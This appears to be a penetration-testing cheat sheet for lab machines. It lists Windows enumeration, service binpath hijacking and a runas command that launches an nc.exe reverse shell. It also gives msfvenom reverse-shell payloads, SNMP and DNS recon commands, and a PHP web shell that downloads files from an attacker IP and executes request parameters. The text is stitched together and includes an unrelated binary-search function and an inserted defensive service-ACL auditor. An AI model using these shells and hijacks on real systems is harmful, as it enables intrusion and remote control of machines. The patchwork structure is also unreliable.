// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
Sometimes, if the user has saved credentials with cmdkey, we can use runas with the saved credential to run commands as them.
- list saved cmdkey credentials: `cmdkey /list`
- run as administrator in the ACCESS domain: `runas /user:ACCESS\administrator /savecred "C:\xxxxx\nc.exe -nv xxxxx 443 -e C:\Windows\System32\cmd.exe"`
- accesschk.exe /accepteula -uwcqv "Authenticated Users"
- sc qc <service>
- sc config <service> binpath= "<new bin path>"
- sc config <service> obj= ".\LocalSystem" password= ""
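The accesschk line above asks which services grant write access to Authenticated Users. The following is an added example, not code from this gist, that does the same audit from the defender's side on `sc sdshow <service>` output: it parses each service's SDDL and flags allow-ACEs that give broad principals SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER. The SDDL strings are constructed samples, and the abbreviation-to-right mapping follows Microsoft's SDDL notation for service objects.

```python
import re

# SDDL right abbreviations on service objects that let a caller reconfigure or take it over.
CONFIG_RIGHTS = {"DC": "SERVICE_CHANGE_CONFIG",  # rewrite binPath= / obj= / start type
                 "WD": "WRITE_DAC", "WO": "WRITE_OWNER",  # rewrite the service ACL / owner
                 "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
# The same rights as bits, for the occasional ACE that sc sdshow prints as a hex mask.
RIGHT_BITS = {"DC": 0x2, "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000, "GW": 0x40000000}
# Well-known SDDL aliases / SIDs for broad principals (what the accesschk query asks about).
BROAD_TRUSTEES = {"AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
                  "BU": "Users", "S-1-5-32-545": "Users",
                  "WD": "Everyone", "S-1-1-0": "Everyone",
                  "IU": "Interactive", "S-1-5-4": "Interactive"}
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);[^;]*;(?P<rights>[^;]*);;;(?P<sid>[^)]*)\)")

def split_rights(rights):
    """'CCDCLCSW' -> {'CC','DC','LC','SW'}; a hex mask is decoded against RIGHT_BITS."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {abbr for abbr, bit in RIGHT_BITS.items() if mask & bit}
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}

def weak_service_aces(sddl):
    """Allow-ACEs in the DACL granting config/ownership rights to a broad principal."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # drop owner/group prefix and the SACL
    findings = []
    for ace in ACE_RE.finditer(dacl):
        if ace["type"] != "A":  # only access-allowed ACEs grant anything
            continue
        granted = sorted(CONFIG_RIGHTS[r] for r in split_rights(ace["rights"]) & set(CONFIG_RIGHTS))
        if granted and ace["sid"] in BROAD_TRUSTEES:
            findings.append({"trustee": BROAD_TRUSTEES[ace["sid"]], "rights": granted})
    return findings

def audit_services(sdshow_outputs):
    """{service: SDDL from 'sc sdshow <service>'} -> {service: findings}, weak services only."""
    return {name: f for name, sddl in sdshow_outputs.items() if (f := weak_service_aces(sddl))}

# Constructed samples (not real output): a stock-looking descriptor, one that hands
# Authenticated Users full control by abbreviation, and one that does so via a hex mask.
SAMPLE_SDSHOW = {
    "okSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "weakSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)",
    "hexSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;0x000F01FF;;;S-1-5-11)",
}
```

Feed it the SDDL from `sc sdshow` for every service (`sc query type= service state= all` lists them) and treat any hit as a service an unprivileged user could repoint at their own binary.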
- snmpwalk -c public -v1 <target>
- snmp-check -w -t 30 <target>
msfvenom -p cmd/unix/reverse_python LHOST=10.11.0.57 LPORT=80 SHELL=/bin/bash -v payload -a cmd --platform Unix
msfvenom -p python/shell_reverse_tcp LHOST=10.10.12.12 LPORT=4444
Sometimes the DNS settings affect the page the website serves, because of the server-side code.
vim /etc/hosts and add a line like "<ip> domain", e.g. "10.10.10.120 chaos.htb"
dig axfr @10.10.10.xx xxx.htb
dnsrecon -n <dns server ip> -r <ip range> --db xxx.db
e.g. dnsrecon -n 10.10.10.83 -r 10.0.0.0/8 --db olympus.db
Have a www-data shell and credentials for user xxx, but user xxx's shell is rbash => su -l xxxx
def lower_bound(vals, target):
    # vals is sorted; return the first index whose value is >= target (len(vals) if none).
    l, r = 0, len(vals)
    while l < r:
        mid = (l + r) // 2
        if vals[mid] < target:
            l = mid + 1
        else:
            r = mid
    return r
https://github.com/rasta-mouse/Watson
https://github.com/rasta-mouse/Sherlock
https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
https://github.com/EmpireProject/Empire
Note: remember to add the function you want to use at the bottom of sherlock.ps1 in order to call it, e.g. "Find-AllVulns".
No "()". Similarly for PowerUp.ps1 (enumerates all low-hanging fruit) in Empire, add "Invoke-AllChecks".
For "windows-exploit-suggester.py":
python windows-exploit-suggester.py --update
<?php
if(isset($_REQUEST['fupload'])) {
    file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.19/" . $_REQUEST['fupload']));
};
if(isset($_REQUEST['fexec'])) {
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
?>